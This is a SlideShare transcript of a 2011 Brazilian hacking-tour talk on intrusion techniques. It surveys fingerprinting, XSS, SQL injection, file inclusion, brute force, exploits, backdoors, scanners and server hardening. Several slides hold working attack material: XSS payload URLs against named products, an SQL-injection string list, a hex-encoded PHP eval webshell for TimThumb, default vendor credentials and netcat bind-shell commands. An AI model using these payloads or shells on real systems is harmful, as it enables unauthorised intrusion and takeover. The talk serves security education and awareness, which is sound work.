• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por

"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por






Total Views
Views on SlideShare
Embed Views



5 Embeds 72

http://pimentanetwork.blogspot.com 37
http://pimentanetwork.blogspot.com.br 31
http://www.pimentanetwork.blogspot.com 2
http://7378201184975825241_0241d62974bceaaa6ab812d5aa2d6403ba2edab0.blogspot.in 1
http://pimentanetwork.blogspot.de 1



Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por Presentation Transcript

    • Intrusion Techniques DcLabs Hacking Tour 2011Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • повестка дняотпечатков пальцевВеб-ошибокЗадняя дверьгрубая силашеллкодЭксплойтыСканерыEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • FingerPrint Grab informations about a target host. Ex: Its used to identify Operational System and/or Services(daemon) version number by TCP/IP responses unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –P0 host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion)Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Passive - FingerPrint • TTL - When the operating system sets the Time To Live on the outbound packet • Window Size - When the operating system sets the Window Size at. • DF - =The operating system set the Dont Fragment bit. • TOS - The operating system set the Type of Service, and if so, at what.Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • FingerPrintMatrix:Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • FingerPrintU. BourneEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • FingerPrintIn BackTrack Linux you can find many softwares toFinger-Print Http://www.backtrack-linux.comEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Web VulnerabilityThese vulnerabilities are initially explored throughmalicious browser requests compromising the targetin a matter of minutes Cross Site (XSS) – Reflected / Stored SQL-Injection PHP (LFI / RFI/ AFU / RCE)Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Web VulnerabilityCross-site scripting (XSS) is a type of computer securityvulnerability typically found in web applications that enablesmalicious attackers to inject client-side script into web pagesviewed by other users.Spekx – Knowledge Base -http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3ELMS Web Ensino – TOTVShttp://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=BuscarEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Web Vulnerability Reflected / Stored Xss DEMOEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Web VulnerabilityEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • What is the impact?Why?Examples?Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Web VulnerabilitySQL-InjectionIt occurs when the attacker can insert a series of SQL statementswithin a query by manipulating the data entry application.SELECT campos FROM tabela WHERE campo = test@test.com;Inject string: some OR x=xSELECT fields FROM table WHERE field = ‘some OR x=x;admin-- " or 0=0 # or 1=1-- hi or a=a or 0=0 -- or 0=0 # " or 1=1-- hi) or (a=a" or 0=0 -- or x=x or 1=1-- hi") or ("a"="aor 0=0 -- " or "x"="x or a=a-- ‘);Drop table x;-- or 0=0 # ) or (x=x hi" or 1=1 -- ) or (a=aEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • SQL-Injection LIVE DEMO OCOMON Throwing fudge at the fanEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Web VulnerabilityCGI/PHP Command InjectionIt occurs when the attacker insert a series ofcommands exploiting vulnerable CGI/PHP scriptsOneorZero – AFU + LFIhttp://server/oneorzero/index.php?controller=../[FILE].phpWordPress TimThumb (Theme) Plugin – RCE x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Default/Weak passwordsDefault passwords are set by its manufacturers/developersand were not changed after the installation/configuration.As supplied by the system vendor and meant to be changed atinstallation time (Nobody do this shit)Ex: Sw 3Com:User: security - Pass: securityFireBird:User: sysdba - Pass: masterkeyWeak: Passwords that are easily guessed or in a keyboardsequentialEx: 123456 - Love - House´s phone - Birthday - Etc...Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Brute ForceIt consists in using random combinations ofcharacters/numbers and symbols, wordlists and/orstring generators to crack a passwordEx:John the RipperHydraSSH Brute ForceEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application serversEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • ExploitsKinds of Exploits:Local: Usually, the objective of a local exploit is to elevateusers privileges on the machine as close as possible toroot (uid=0) or administrator. They are written to exploitkernel bugs or suid binariesRemote: It works over a network connection andexploit the vulnerable target without any prior access to it.www.securityfocus.comwww.secunia.comwww.exploit-db.com0Days It works usually an unpublished exploit from a brandnew found vulnerability. You can buy! $$$$$Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • ExploitsIf Kernel was patched? Will we cry? Alexos=>Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Exploits No!!!! Fuck him!!! We have others ways to pwn the box GNU C library dynamic linker Suid´s Etc...Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Backdoors/RootKitsUsed to maintain access to the systemWe can Netcat use for this purpose:nc –vv –l –p 5555nc –vv –l –p 5555 –e /bin/bashnc <ip> <port>RootKitsThe main purpose of a rootkit is to hide the attackers presencereplacing vital system binaries from targets systemExample:Hide files (with match strings)Run command when match stringsHide processesHide open ports, and others.Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Scanners/FuzzersThere are 2 types of scanners: Specific which are written fora specific vulnerability (BSQLHacker, SQLMAP) and Genericwhich are written for various kinds of vulnerabilities. Genericscanners use known service banners/strings to locate thepotential target/vulnerabilities W3af NessusEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Scanners/FuzzersEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Scanners/FuzzersEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • SniffersSniffer monitors and analyzes network traffic. Some of thesepackets may contain critical information (such as logins,passwords and cool infos )WhireShark -Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • MetaSploitEwerson Guimarães (Crash) DcLabs – HackingTour 2011
    • MetaSploit Let´s Fuck Windows?Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Hardening your serverHnTool is an open source (GPLv2) hardening tool for Unix.It scans your system for vulnerabilities or problems inconfiguration files allowing you to get a quick overview ofthe security status of your system.Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Questions?Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
    • Contact Crash - crash@dclabs.com.br Irc: irc.freenode.net #dclabs twitter: @crashbrzEwerson Guimarães (Crash) DcLabs – HackingTour 2011